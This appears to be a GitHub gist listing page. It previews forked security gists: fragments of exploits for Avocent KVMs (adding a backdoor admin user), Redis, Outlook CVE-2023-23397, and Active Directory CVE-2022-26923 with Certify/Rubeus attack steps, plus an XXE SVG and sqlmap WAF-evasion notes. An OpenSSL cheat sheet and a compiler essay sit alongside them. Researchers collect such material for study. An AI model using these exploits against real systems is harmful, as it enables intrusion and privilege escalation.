#OpenSSL cheat sheet This is a brief howto for socket programmers.
ex: 1024bits length key pair:
$> openssl genrsa -out myprivate.pem 1024
$> openssl rsa -in myprivate.pem -pubout -out mypublic.pem
infernalheaven
infernalheaven
/ OpenSSL cheat sheet for socket programmers.md
Created
January 9, 2024 16:29
— forked from azadkuh/OpenSSL cheat sheet for socket programmers.md
OpenSSL cheat sheet. This is a brief howto for socket programmers.
infernalheaven
/ asmpwn.py
Created
December 30, 2023 15:08
— forked from aemmitt-ns/asmpwn.py
Remote pre-auth heap buffer overflow exploit for Avocent KVMs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket, struct, sys | |
| p32 = lambda x: struct.pack(">I", x) | |
| p16 = lambda x: struct.pack(">h", x) | |
| p8 = lambda x: struct.pack(">b", x) | |
| # ASMP heap overflow exploit creates new applianceAdmin user | |
| def exploit(hostname, username="Backdoor", password="Backdoor"): | |
| global socks # python closes out of scope sockets | |
| port = 3211 # port is hardcoded in the binary | |
| usernm = username.encode() |
infernalheaven
/ Redis CVE-2015-4335 EVAL Lua Sandbox Security Bypass Vulnerability PoC
Created
November 7, 2023 14:46
— forked from firsov/Redis CVE-2015-4335 EVAL Lua Sandbox Security Bypass Vulnerability PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # https://www.reddit.com/r/netsec/comments/4a93eo/analysis_of_vm_escape_by_using_lua_script/d0zcsgl | |
| import sys | |
| import time | |
| import getopt | |
| import socket | |
| ''' | |
| Gives the hexadecimal representation of "command" |
infernalheaven
/ host_getter.svg
Created
April 17, 2023 12:44
— forked from jakekarnes42/host_getter.svg
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
infernalheaven
/ find_symbol.sh
Created
April 2, 2023 16:23
— forked from SeanPesce/find_symbol.sh
Linux shell command to find binaries that contain a specific symbol. Useful when searching for command injection and other vulnerabilities.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| SYMBOL_NAME="system"; find ./ -type f -exec printf "{}: " \; -exec sh -c "objdump -T \"{}\" 2>&1 | grep -e \" $SYMBOL_NAME\" ; echo \"\"" \; | grep -e " $SYMBOL_NAME" |
infernalheaven
/ PidLidReminderPwn.py
Created
March 28, 2023 09:41
— forked from tothi/PidLidReminderPwn.py
Exploiting Outlook CVE-2023-23397 using Python by sending the message through EWS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python -u | |
| from exchangelib import Credentials, Configuration, Account, DELEGATE, Message, Mailbox, ExtendedProperty | |
| from exchangelib.ewsdatetime import EWSDateTime, EWSTimeZone, UTC_NOW | |
| from exchangelib.protocol import BaseProtocol, NoVerifyHTTPAdapter | |
| BaseProtocol.HTTP_ADAPTER_CLS = NoVerifyHTTPAdapter | |
| import urllib3 | |
| urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
infernalheaven
/ gist:2243996a3f9b2924ea93424efb3cadd2
Created
February 3, 2023 23:47
— forked from rygorous/gist:e0f055bfb74e3d5f0af20690759de5a7
A bit of background on compilers exploiting signed overflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Why do compilers even bother with exploiting undefinedness signed overflow? And what are those | |
| mysterious cases where it helps? | |
| A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but | |
| I think it's useful to know what compiler writers are accomplishing by this. | |
| TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all | |
| major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some | |
| fairly common cases. The signed overflow UB exploitation is an attempt to work around this. |
infernalheaven
/ gist:8b2cc96ff3c0a07de283257b9ad5fbaf
Created
February 3, 2023 23:47
— forked from rygorous/gist:e0f055bfb74e3d5f0af20690759de5a7
A bit of background on compilers exploiting signed overflow
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Why do compilers even bother with exploiting undefinedness signed overflow? And what are those | |
| mysterious cases where it helps? | |
| A lot of people (myself included) are against transforms that aggressively exploit undefined behavior, but | |
| I think it's useful to know what compiler writers are accomplishing by this. | |
| TL;DR: C doesn't work very well if int!=register width, but (for backwards compat) int is 32-bit on all | |
| major 64-bit targets, and this causes quite hairy problems for code generation and optimization in some | |
| fairly common cases. The signed overflow UB exploitation is an attempt to work around this. |
infernalheaven
/ sqlmap-tamper-scripts-evaluation.md
Created
November 16, 2022 21:47
— forked from mgeeky/sqlmap-tamper-scripts-evaluation.md
SQLMap Tamper scripts evaluation against F5 Big-IP ASM WAF
The below table represents results of tests launched against F5 Big-IP ASM WAF appliance in it's XX version of YY and ZZ version of XY
Below names are to be passed to the --tamper= parameter of sqlmap.
The column Violation Rating represents most dominant rating of topmost 20 Requests observed by F5 in it's Security>>Event Logs:Application:Requests view.
The scale is 0-5.
infernalheaven
/ Program.cs
Created
May 12, 2022 12:29
— forked from dmchell/Program.cs
Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Exploit for Active Directory Domain Privilege Escalation (CVE-2022–26923) | |
| // Author: @domchell - MDSec | |
| // This exploit can be used to update the relveant AD attributes required to enroll in a machine template as any machine in AD using an existing machine account | |
| // Adjusting MS-DS-Machine-Account-Quota is not sufficient to stop this attack :) | |
| // Steps: | |
| // 1. Escalate on any workstation (hint: krbrelayup ftw) | |
| // 2. Execute UpdateMachineAccount.exe as SYSTEM | |
| // 3. Enroll in machine template e.g. (Certify.exe request /ca:"ca.evil.corp\\CA" /template:Computer /machine /subject:CN=dc.evil.corp | |
| // 4. Request a TGT using the certificate e.g. (Rubeus.exe asktgt /user:dc$ /domain:evil.corp /dc:dc.evil.corp /certificate:<base64 cert> /enctype:AES256) |